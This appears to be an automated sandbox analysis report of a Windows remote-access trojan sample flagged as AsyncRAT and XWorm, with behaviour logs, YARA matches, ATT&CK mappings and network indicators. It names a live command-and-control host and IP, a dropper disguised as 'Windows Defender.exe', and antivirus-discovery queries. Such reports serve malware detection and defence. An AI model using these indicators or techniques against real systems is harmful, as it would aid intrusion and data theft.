Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows Defender.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows Defender.exe VolumeInformation

Source: C:\Users\user\Desktop\owuP726k3d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: owuP726k3d.exe, type: SAMPLE
Source: Yara match	File source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED

Source: owuP726k3d.exe, 00000000.00000002.2735847432.000000001B9E7000.00000004.00000020.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2722622589.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2741809500.000000001C73D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\owuP726k3d.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\owuP726k3d.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\owuP726k3d.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: owuP726k3d.exe, type: SAMPLE
Source: Yara match	File source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2727195989.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: owuP726k3d.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: owuP726k3d.exe, type: SAMPLE
Source: Yara match	File source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2727195989.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: owuP726k3d.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 Input Capture	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Input Capture	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	541 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
owuP726k3d.exe	79%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
owuP726k3d.exe	100%	Avira	TR/Spy.Gen
owuP726k3d.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Windows Defender.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\Windows Defender.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Windows Defender.exe	79%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT

Source	Detection	Scanner	Label
http://www.microsofm/pki/certs/MicRooCerAut_2010-06-23.	0%	Avira URL Cloud	safe
http://crl.mH	0%	Avira URL Cloud	safe
george-liechtenstein.gl.at.ply.gg	100%	Avira URL Cloud	malware
https://.VisualC	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rentry.co	172.67.75.40	true	false	high
ip-api.com	208.95.112.1	true	false	high
george-liechtenstein.gl.at.ply.gg	147.185.221.19	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://rentry.co/8wum7vax/raw	false		high
george-liechtenstein.gl.at.ply.gg	true	Avira URL Cloud: malware	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1598749378.0000025190072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1698421338.00000194A8E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834435428.000001B133E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000008.00000002.1854619470.000001B13C414000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2095107365.000002786B961000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1581807270.0000025180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123FFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1581807270.0000025180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123FFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1598749378.0000025190072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1698421338.00000194A8E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834435428.000001B133E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	false		high
http://rentry.co	owuP726k3d.exe, 00000000.00000002.2727195989.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2727195989.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	false		high
https://.VisualC	powershell.exe, 00000008.00000002.1849764161.000001B13C110000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1581807270.0000025180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.0000027800001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsofm/pki/certs/MicRooCerAut_2010-06-23.	powershell.exe, 0000000A.00000002.2095107365.000002786B9BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	owuP726k3d.exe, 00000000.00000002.2727195989.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1581807270.0000025180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.000002780003B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.microsoft.co	powershell.exe, 00000005.00000002.1712125357.00000194B1412000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rentry.co	owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mH	powershell.exe, 0000000A.00000002.2095107365.000002786B961000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micros	powershell.exe, 0000000A.00000002.2095107365.000002786B9BF000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
172.67.75.40	rentry.co	United States	13335	CLOUDFLARENETUS	false
147.185.221.19	george-liechtenstein.gl.at.ply.gg	United States	12087	SALSGIVERUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561591
Start date and time:	2024-11-23 21:07:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	owuP726k3d.exe renamed because original name is a hash value
Original Sample Name:	4d3101ba1ec70ddd04a30b6f04a67817920a6601e477339e5c135c167f6ab1e2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/21@3/3
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Successful, ratio: 98% Number of executed functions: 72 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Windows Defender.exe, PID 6324 because it is empty
Execution Graph export aborted for target Windows Defender.exe, PID 7132 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2156 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4052 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5916 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6408 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: owuP726k3d.exe

Simulations

Behavior and APIs

Time	Type	Description
15:08:15	API Interceptor	58x Sleep call for process: powershell.exe modified
